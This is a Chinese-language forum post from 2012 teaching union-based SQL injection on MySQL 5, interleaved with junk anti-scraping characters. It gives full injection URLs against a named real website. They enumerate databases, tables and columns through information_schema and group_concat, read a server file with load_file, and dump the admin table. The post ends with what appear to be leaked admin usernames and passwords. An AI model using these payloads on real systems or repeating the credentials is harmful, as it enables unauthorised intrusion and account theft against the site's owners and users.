此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似1 _! A' x. T4 Q9 L0 D, t! W; T+ s
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
3 [- q0 p- }& b, n, Q H7 n- x1 C* D4 v5 D( p$ ^1 j! v
6 g- N$ Q1 ~" t8 x4 m( G
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
- s" Q0 U& [) y" {( F
$ a0 e! a. Q5 \: n/ R' B缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...0 Y% e, ^4 D9 N7 `" ]9 M$ {( E$ o3 X: M
4 \2 a4 W$ ~. J
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
' f; a2 C) _/ L' q* K" Y( j1 X在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
# b3 e( W5 Q; f( C
* Q7 g: d+ ~4 E' N0 phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
# A7 X4 D4 V; [2 j6 B) ]
u# o2 S; \7 `读出所有库:
$ J- ]8 a& E1 j/ h- Z% v+ Chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA: } h& G$ P6 N- f/ l
1 L4 j* w* r! S/ j7 p9 r# }( x
" d/ O! y2 d# \
# k2 z x+ x4 k* B* Z8 z读出所有表:, N+ s: J" d; h# w+ o" G0 i9 J' @
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
0 @" w) ]9 k0 R g) m9 a
- D" s3 p1 c% u* X5 Y2 w! D' j( J读出所有表字段:
( I0 z- s. f- Y* yhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
; J; Q. b' p6 j2 Q: E*/ (97,100,109,105,110)为admin的ascii码 依次类推
9 G9 M4 R6 H4 s' m; R- `8 F) C% ?. u5 O
读出所有表字段里的内容:5 V7 e$ A c5 c/ T7 i7 V) ~
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
6 Q( x/ s2 h! ]2 z
D* T$ M6 K4 F3 T6 g9 R1 [, O0 L9 V0 k$ D6 B- w1 h
- U* l# b1 x! L$ t+ h
- X q& o# D" s# r; E$ ]( ~* j1 ~$ S6 q; A I, j( u1 }; t
7 R7 z' @! C" _: H( m% K
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23! O1 o: K: f5 h8 Q, _
) ]4 o E+ J6 {8 T4 n# S3 v! ^$ `; o& \4 s2 k
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
3 d+ |9 f; M' O
4 j4 [& w4 ^& i3 F! [http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%239 o0 ], x! v2 a" u5 ?8 z
' o, N" ^. r5 S: N/ B* Q0 ]
+ r& G, t% b/ h9 ]+ s
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23% r0 S2 d. H( {0 N' \ w3 i& C
9 f7 D w$ Q+ B9 e
6 u0 X1 q$ K, ~, l: s7 x webmaster:dzb521123,simlab:simadmin20043233" d6 s! |! a0 I, S) x! W2 ~8 C9 F
|
发表于 2012-9-13 16:37:34
收藏
支持
反对